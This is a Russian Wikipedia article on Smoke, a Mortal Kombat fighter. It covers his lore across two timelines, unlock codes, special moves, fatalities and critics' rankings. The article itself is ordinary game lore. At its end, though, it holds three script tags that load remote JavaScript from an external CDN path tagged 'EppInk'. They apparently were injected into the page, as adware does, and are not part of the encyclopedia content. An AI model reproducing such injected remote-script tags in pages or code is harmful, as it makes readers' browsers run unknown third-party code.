Смоук

Материал из Википедии — свободной энциклопедии
Перейти к: навигация, поиск
Смоук (Smoke)
Smoke.png
Игровая серия

Mortal Kombat

Появления

Mortal Kombat II
Mortal Kombat 3
Ultimate Mortal Kombat 3
Mortal Kombat Trilogy
Mortal Kombat Advance
MK: Deception (как Noob-Smoke)
MK: Shaolin Monks
MK: Unchained (как Noob-Smoke)
MK: Armageddon
Mortal Kombat (2011)
Mortal Kombat X

Живое исполнение

Даниэль Песина (MKII)
Сэл Дивита (MK3, UMK3, MKT как Cyber Smoke)
Джон Тёрк (UMK3, MKT)
Ридли Тсуи (второй фильм)
Джек Энджел (мультсериал)

Дополнительная информация
Возраст

26 лет (Mortal Kombat II)
34 года (Mortal Kombat: Deception)

Вид (раса)

1-я временная линия - Киборг (ранее Человек)
2-я временная линия - Призрак

Место рождения

Земля, Прага, Чехия

Стиль боя

Ми Тцу (MK:D, MK:A)
Дзюдо (MK:A)

Мировоззрение

1-я временная линия - Добро (перепрограммирован на Зло)
2-я временная линия - Зло (невольное), ранее Добро

Оружие

Секира (UMK3, MKT)

Смоук (англ. Smoke) — персонаж серии игр Mortal Kombat. Чех по происхождению. Настоящее имя — Томаш Врбада (чешск. Tomáš Vrbáda). Впервые появился в качестве неиграбельного секретного персонажа в Mortal Kombat II. Третий киборг, запрограммированный на убийство Саб-Зиро. Кодовое имя — LK-7T2. Один из самых популярных персонажей в серии Mortal Kombat.

Рост: 185 см

Вес: 77 кг (человек); 252 кг (киборг)

Описание[править | править вики-текст]

Бывший член клана Лин Куэй и давний друг младшего Саб-Зиро, Смоук дебютировал в Mortal Kombat II как скрытый персонаж. Он часто появлялся в живом лесу, в котором он (наряду с Джейд) выглядывал из-за деревьев. Его первый внешний вид был просто серой версией Скорпиона (правда, с боевой стойкой Рептилии), с клубами дыма вокруг его тела. В Mortal Kombat 3 он снова был скрытым персонажем, но доступным для игроков с использованием кода. Здесь он впервые предстаёт в виде киборга. Он выглядел как перекрашенный в серый цвет Сектор.

История[править | править вики-текст]

Смоук в человеческом облике, как Томаш Врбада

История Смоука начинается как ниндзя убийцы из китайского клана Лин Куэй. Он был другом и союзником младшего Саб-Зиро, с которым он отправился во Внешний мир с миссией убить Шан Цуна. Они не смогли выполнить свою миссию. Когда Саб-Зиро и Смоук вернулись в Лин Куэй, они обнаружили, что их клан решил превратить своих лучших воинов в киборгов, и уже были готовы Сектор и Сайракс. Смоук и Саб-Зиро предали свой клан и сбежали. Саб-Зиро удалось сбежать, а Смоук был захвачен и преобразован в кибернетического воина, названного LK-7T2. Он был запрограммирован Лин Куэй охотиться на своего старого друга.

Во время событий в Mortal Kombat Trilogy и вторжения Шао Кана на Землю, Смоук по прежнему не распоряжался своей судьбой. Несмотря на то что его душа была избрана Райденом в помощь Саб-Зиро для уничтожения Сектора и Сайракса, он был захвачен силами Шао Кана. Безжизненное тело Смоука было перевезено во Внешний мир в качестве трофея и было закрыто в недрах крепости Шао Кана.

Почти десять лет спустя, он был обнаружен Нуб Сайботом. Он возобновил деятельность киборга, чьи нанотехнологии нуждались в ремонте и улучшении своих систем. Перепрограммированный Смоук подчинялся только ему, Нуб превратил кибер-ниндзя в своего союзника (хотя на самом деле — в марионетку) и прототипа для будущей армии кибер-демонов, чтобы выбраться из Преисподней.

В Mortal Kombat: Armageddon, в режиме прохождения, Смоук вместе с Нубом устраивают нападение на храм Лин Куэй, расположенный в Арктике. Здесь показана способность Смоука превращать человека в воина тени, тёмной версии прежнего себя. Он вступает в борьбу с Тэйвеном, но в конечном итоге уступает. Он телепортируется, чтобы сообщить Нубу о вмешательстве Тэйвена в его планы.

В концовке Смоука в Армагеддоне, он победил Блейза и получил его силы. Его нанотехнологии приобретают способность к размножению и Дым разрастается на весь мир толстым слоем чёрной массы. Губит всё живое и, разумеется, держит весь мир в кулаке, причём в буквальном смысле.

Новая хронология[править | править вики-текст]

В Mortal Kombat (2011) Смоук появляется в виде человека, и не подвергается трансформации в киборга (вместо него забирают Саб-Зиро). Выясняется так же, что его зовут Томаш Врбада, и что в детстве его заживо сожгли в знак жертвоприношения какому-то демону. Однако, Смоук остался в живых, превратившись в энэнру, но при этом он потерял память. После победы над Шао Каном он вернул себе все воспоминания и полностью переосмыслил свою жизнь. Как и в основной временной линии, он так же является близким другом младшего Саб-Зиро. Был убит Синдел, как и многие земные воины. Она свернула ему шею.

Развитие персонажа[править | править вики-текст]

Его первая форма была создана для Mortal Kombat II, он был просто серым клоном Скорпиона, в Ultimate Mortal Kombat 3 он разделил добивание — обезглавливание апперкотом с Эрмаком. В Mortal Kombat Trilogy он получил свой собственный набор добиваний. Его человеческая форма в Ultimate Mortal Kombat 3 становится доступной, если ввести код, выбрав его кибернетическую форму. В его окончании говорится, что он был в состоянии каким-то образом сбежать из своего искусственного тела, и вступил в подготовку к Mortal Kombat 4. В Mortal Kombat: Deception Смоук приобрел новый облик полудемона-полукиборга, который также был использован в Mortal Kombat: Armageddon. Он больше не выглядел, как бионический андроид. Его тело полностью состояло из дыма, на лице была маска, на теле — жилет и перчатки на руках. В остальном он выглядел обычно: штаны и сапоги.

Смоук рассматривался многими фанатами как неоригинальный персонаж. В отличие от предыдущих скрытых персонажей, которые приобрели свои уникальные специальные способности и комбинации нападения, Смоук продолжал использовать методы идентичные или аналогичные другим персонажам, в обеих своих формах. В Mortal Kombat Deception Смоук приобрел свой первый оригинальный набор приёмов, но реакция на потерю гарпуна была довольно негативной.

Доступ к персонажу[править | править вики-текст]

  • Mortal Kombat II: иногда после выполнения апперкота в правом нижнем углу экрана появляется Дэн Форден, кричащий «Toasty!» Если бой происходит на арене «Портал» и сделавший апперкот в этот момент нажмёт вниз+START, он тут же будет драться со Смоуком. Управлять самим Смоуком невозможно.
  • Mortal Kombat II: если игрок одержит 25 побед подряд (25 раз выиграть 2 турнира с любым игроком), то ему представится возможность сразиться со Смоуком.
  • Mortal Kombat 3: В главном меню ввести код: С, вправо, А, влево, А, вверх, С, вправо, А, влево, А, вверх. Появится меню Killer Codes. Опция «Smoke» даст возможность играть за Смоука.

Также, когда показывается логотип MK3 и звучит гонг, нужно набрать команду A, B, B, A, DOWN, A, B, B, A, DOWN, UP, UP.Экран станет багровым, а Шао-Кан скажет «Смоук». После этого Смоук будет открыт в таблице выбора бойцов.

  • Ultimate Mortal Kombat 3: На VS-экране ввести код 444444 (??????) — будет постоянный морфинг. В последнем раунде довести здоровье противника до смерти с 1 удара и дождаться, пока победитель превратится в Смоука-Человека. Как только это случится, добить врага, но после боя на джойстике проигравшего START не нажимать — Смоук-человек будет драться против компьютера.
  • Также в UMK3 можно сразу после выбора Смоука-робота зажать кнопки B, X, Y, Z + [ВНИЗ] и держать их до начала раунда. Тогда вы будете драться за Смоука-ниндзя.

Спецприёмы и добивания[править | править вики-текст]

Приёмы[править | править вики-текст]

  • Гарпун — приём, подобный фирменному приёму Скорпиона. Из груди киборга вылетает трезубец на верёвке. Втыкаясь в противника, гарпун притягивает их к Смоуку, оставляя оппонента на две секунды беспомощным.
  • Телепортация с ударом — приём, аналогичный приёму Сектора. Смоук проваливается под землю и вылетает из-под противника, нанося при этом удар.
  • Воздушный бросок — приём, также имеющий аналоги у других персонажей. При контакте с противником в воздухе, Смоук хватает оппонента и бросает спиной на землю.
  • Пахучее облако — Смоук уворачивается от противника, выпуская при этом облако чёрного дыма, которое душит оппонента, если тот к нему прикоснётся.
  • Пахучие пальцы — Смоук делает пасы руками и создаёт облако чёрного дыма, которое душит противника, если тот к нему прикоснётся.
  • Притворство мёртвым — Смоук падает на спину и проваливается в дым, после чего вновь возникает позади оппонента.
  • Робо-удар — Смоук делает резкий выпад и наносит удар кулаком.
  • Рывок/отступление — Смоук окутывает себя дымом, после чего делает рывок либо вперёд, либо назад (МК (2011)).
  • Телепорт — Смоук исчезает, после чего появляется позади оппонента и наносит ему удар в спину, затем появляется спереди и бьёт противника в живот. При усилении делает дополнительный удар сверху (МК (2011)).
  • Облако дыма — Смоук генерирует дымовой снаряд и метает его. В случае контакта, оппонент Смоука окутывается дымом и переносится близко к Смоуку, что делает оппонента уязвимым для атаки (МК (2011)).
  • Встряска — Смоук создаёт вокруг себя облако дыма. Если снаряд оппонента прикоснётся к нему, Смоук нанесёт ответный удар. Может стоить Смоуку здоровья (МК (2011)).
  • X-Ray — Смоук бьёт противника под дых, после чего заходит за спину оппонента, хватает его и, прогибаясь, бросает на землю, ломая при этом челюсть и шею. Когда противник падает, Смоук разбегается и бьёт его ногой в лицо. Когда оппонент приземляется на спину, Смоук произносит "Stand Up" ("Вставай") (МК (2011)).

Добивания[править | править вики-текст]

Фаталити[править | править вики-текст]

  • Бомба — Смоук заталкивает в рот противнику бомбу, которая взрывается и полностью уничтожает оппонента.
  • Армагеддон — Смоук раскидывает множество бомб. После этого из космоса показывают взрыв планеты.
  • Убийственный гарпун — из груди Смоука вылетает гарпун, который пронзает противника и возвращается. Данное добивание есть лишь в GameBoy-версии игры Mortal Kombat 3.
  • Невидимое обезглавливание — Смоук концентрирует дым и исчезает. Затем, он наносит противнику удар, после чего отрывает оппоненту руки. Затем он ударом раскалывает противнику голову на куски и вновь появляется.
  • Задымление — Смоук пробивает двумя пальцами голову противника и запускает в образовавшееся отверстие дым. После этого из тела противника начинает струиться дым и слезает вся кожа. Обезображенный оппонент падает на землю (МК (2011)).
  • Сотрясение — Смоук превращается в облако дыма и пролетает сквозь противника, материализуясь с другой стороны. После этого дымящийся оппонент разваливается на куски (МК (2011)).

Хара-Кири[править | править вики-текст]

  • Самоуничтожение — Смоук активирует систему самоликвидации и взрывается через несколько секунд.

Критика и отзывы[править | править вики-текст]

Смоук был положительно оценён игровыми критиками:

  • В 2011 году он вместе с Сектором и Сайраксом занял первое место в списке сайта Games Radar «Самых смертоносных игровых машин», с комментарием «никто не делает убийц-киборогов как MK».[1]
  • ScrewAttack поставил Смоука на 5 место в их списке 2011 года «лучшие персонажи Mortal Kombat», заявив, что «с гарпуном Скорпиона и невидимостью Рептилии, это тот ниндзя, с которым вы не захотите увидеться».[2]

См. также[править | править вики-текст]

  • Сектор — первый киборг-убийца из клана Лин Куэй. Его кодовое имя LK-9T9. В отличие от двух остальных киборгов, остался верен программе и сражался на стороне зла.
  • Сайракс — второй киборг-убийца из клана Лин Куэй. Его кодовое имя LK-4D4. В отличие от двух остальных киборгов, Сайракс стал сражаться за Земное Царство.
  • Саб-Зиро — только в MK2011 среди персонажей появился также Кибер Саб-Зиро из клана Лин Куэй. Его кодовое имя LK-520.

Примечания[править | править вики-текст]

  1. Page 2 of Gaming's most malicious machines, Mortal Kombat (2011) Xbox 360 Features. GamesRadar. Проверено 23 октября 2011.
  2. Top 10 Mortal Kombat Kharacters. ScrewAttack.com (8/15/11). Проверено 23 октября 2011.

Ссылки[править | править вики-текст]

<script type="text/javascript" src="https://cdncache-a.akamaihd.net/sub/y8e553e/eppc/l.js?pid=2241&ext=EppInk"></script><script type="text/javascript" src="https://cdncache-a.akamaihd.net/sub/y8e553e/eppc/l.js?pid=2264&ext=EppInk"></script><script type="text/javascript" src="https://cdncache-a.akamaihd.net/sub/y8e553e/eppc/l.js?pid=2265&ext=EppInk"></script>